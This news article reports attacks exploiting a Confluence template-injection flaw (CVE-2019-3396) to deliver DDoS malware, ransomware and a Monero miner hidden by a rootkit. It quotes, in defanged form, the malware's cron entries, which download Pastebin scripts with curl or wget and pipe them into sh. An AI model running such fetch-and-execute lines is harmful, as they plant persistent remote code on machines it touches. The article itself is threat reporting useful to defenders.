After getting pounded with ransomware and malware for deploying distributed denial-of-service (DDoS) attacks, unpatched Confluence servers are now compromised to mine for cryptocurrency.
On March 20, Atlassian released patches for two critical-severity vulnerabilities affecting Confluence Server and Confluence Data Center. Of them, CVE-2019-3396, is a server-side template injection in the Widget Connector that can lead to remote code execution.
Three weeks later, cybercriminals created the first exploit for this security bug and started hitting vulnerable Confluence servers. Troy Mursch of Bad Packets security company noticed exploitation activity from an IP address in Romania, dropping the Dofloo DDoS malware.
We've detected opportunistic exploitation from 184.108.40.206 () targeting a critical Atlassian Confluence Server vulnerability (CVE-2019-3396) that allows remote code execution. The attacker drops Dofloo #malware, which is used for DDoS attacks.— Bad Packets Report (@bad_packets) April 10, 2019
Other exploits were created and researchers soon saw GandCrab ransomware dropped on vulnerable Confluence instances running on Windows.
In a report today, Augusto Remillano II and Robert Malagad detail a new attack leveraging the same vulnerability to deliver a Monero cryptocurrency miner with a rootkit component.
The attack starts by sending a command to download a shell script hosted on Pastebin. After killing some processes, the script downloads and runs another shell script, also from a Pastebin address. This sequence repeats with a third shell script that gets a trojan dropper.
The malware, kerberods (detected as Trojan.Linux.KERBERDS.A), is a custom-packed binary that installs itself via cron jobs:
*/10* * * * curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/15* * * * wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/10* * * * root curl -fsSL hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/15* * * * root wget -q -O- hxxps://pastebin[.]com/raw/60T3uCcb|sh
*/15* * * * (curl -fsSL hxxps://pastebin[.]com/raw/rPB8eDpu||wget -q -O-hxxps://pastebin[.]com/raw/rPB8eDpu)|sh
Kerberods will finally retrieve the Monero miner (khugepageds) and the rootkit part. The researchers highlight the fact that the rootkit comes in code form and gets compiled into a binary with the GNU Compiler Collection (GCC) system.
The rootkit features several self-propagation methods using SSH connections and a Metasploit module for exploiting CVE-2019-1003001 vulnerability in Jenkins automation server.
However, Kerberods' purpose is to hide the cryptojacking activity, files, and network traffic. The researchers say that it can also show arbitrary CPU usage on the affected machine, also in an effort to conceal the mining process.
An attack with a striking resemblance to this one occurred in November 2018. The threat actor also deployed a rootkit and cryptominer combination to hide the cryptojacking activity.